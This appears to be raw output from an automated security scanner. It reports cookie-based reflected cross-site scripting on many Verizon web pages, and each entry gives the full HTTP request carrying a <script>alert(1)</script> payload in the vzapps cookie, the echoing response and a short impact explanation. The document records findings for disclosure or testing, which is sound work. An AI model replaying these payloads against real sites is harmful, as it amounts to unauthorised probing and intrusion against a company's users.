GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXab670<script>alert(1)</script>34458ec6bd8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68152 Expires: Sat, 20 Nov 2010 00:18:41 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:18:41 GMT Connection: close Set-Cookie: ContextInfo_State=TXab670<script>alert(1)</script>34458ec6bd8; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cddfb'><script>alert(1)</script>30cb0779e1a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXcddfb'><script>alert(1)</script>30cb0779e1a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68156 Expires: Sat, 20 Nov 2010 00:18:40 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:18:40 GMT Connection: close Set-Cookie: ContextInfo_State=TXcddfb'><script>alert(1)</script>30cb0779e1a; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b421a'><script>alert(1)</script>297c29e43fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb421a'><script>alert(1)</script>297c29e43fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e00e8<script>alert(1)</script>275bd796ccd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe00e8<script>alert(1)</script>275bd796ccd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50cb2'><script>alert(1)</script>84521e8362 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX50cb2'><script>alert(1)</script>84521e8362; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63787 Expires: Sat, 20 Nov 2010 00:11:30 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:30 GMT Connection: close Set-Cookie: ContextInfo_State=TX50cb2'><script>alert(1)</script>84521e8362; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7f4a'><script>alert(1)</script>12ba1c0fab5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 179664 Expires: Sat, 20 Nov 2010 00:12:33 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:33 GMT Connection: close Set-Cookie: ContextInfo_State=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | DirecTV | Channels </title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire ...[SNIP]... <input type='hidden' id='locationInfo' value='TXE7F4A'><SCRIPT>ALERT(1)</SCRIPT>12BA1C0FAB5 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4eb83'><script>alert(1)</script>d3ff6108a2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4eb83'><script>alert(1)</script>d3ff6108a2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71665 Expires: Sat, 20 Nov 2010 00:11:45 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:45 GMT Connection: close Set-Cookie: ContextInfo_State=TX4eb83'><script>alert(1)</script>d3ff6108a2c; path=/ Set-Cookie: ContextInfo_Equipment=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a607'><script>alert(1)</script>d0ccb927d19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9a607'><script>alert(1)</script>d0ccb927d19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 50560 Expires: Sat, 20 Nov 2010 00:09:11 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:11 GMT Connection: close Set-Cookie: ContextInfo_State=TX9a607'><script>alert(1)</script>d0ccb927d19; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 7ac79<script>alert(1)</script>c047a0243fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX7ac79<script>alert(1)</script>c047a0243fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 50556 Expires: Sat, 20 Nov 2010 00:09:26 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:26 GMT Connection: close Set-Cookie: ContextInfo_State=TX7ac79<script>alert(1)</script>c047a0243fc; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 474e8'><script>alert(1)</script>6198f299341 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX474e8'><script>alert(1)</script>6198f299341; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 65391 Expires: Sat, 20 Nov 2010 00:12:53 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:53 GMT Connection: close Set-Cookie: ContextInfo_State=TX474e8'><script>alert(1)</script>6198f299341; path=/ Set-Cookie: ContextInfo_Language=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64704'><script>alert(1)</script>60e1cc3bb19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX64704'><script>alert(1)</script>60e1cc3bb19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 84381 Expires: Sat, 20 Nov 2010 00:10:02 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:02 GMT Connection: close Set-Cookie: ContextInfo_State=TX64704'><script>alert(1)</script>60e1cc3bb19; path=/ Set-Cookie: ContextInfo_DTVPremium=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ecc81'><script>alert(1)</script>633e3a55ed6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/EntertainmentOnDemand/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXecc81'><script>alert(1)</script>633e3a55ed6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 50751 Expires: Sat, 20 Nov 2010 00:16:06 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:06 GMT Connection: close Set-Cookie: ContextInfo_State=TXecc81'><script>alert(1)</script>633e3a55ed6; path=/ Set-Cookie: FLOWTYPE=VASIP; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Entertainment on Demand </title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies ...[SNIP]... <input type='hidden' id='locationInfo' value='TXECC81'><SCRIPT>ALERT(1)</SCRIPT>633E3A55ED6 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 676cd'><script>alert(1)</script>a3a252376e7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX676cd'><script>alert(1)</script>a3a252376e7; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 75296 Expires: Sat, 20 Nov 2010 00:16:22 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:22 GMT Connection: close Set-Cookie: ContextInfo_State=TX676cd'><script>alert(1)</script>a3a252376e7; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Entertainment on Demand: Games </title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game ...[SNIP]... <input type='hidden' id='locationInfo' value='TX676CD'><SCRIPT>ALERT(1)</SCRIPT>A3A252376E7 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46bbc'><script>alert(1)</script>e3e3a635f7b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX46bbc'><script>alert(1)</script>e3e3a635f7b; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70797 Expires: Sat, 20 Nov 2010 00:16:16 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:16 GMT Connection: close Set-Cookie: ContextInfo_State=TX46bbc'><script>alert(1)</script>e3e3a635f7b; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Entertainment on Demand: Movies </title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi ...[SNIP]... <input type='hidden' id='locationInfo' value='TX46BBC'><SCRIPT>ALERT(1)</SCRIPT>E3E3A635F7B ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56c4c'><script>alert(1)</script>277bd852140 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX56c4c'><script>alert(1)</script>277bd852140; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fc928<script>alert(1)</script>80e25040c4e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
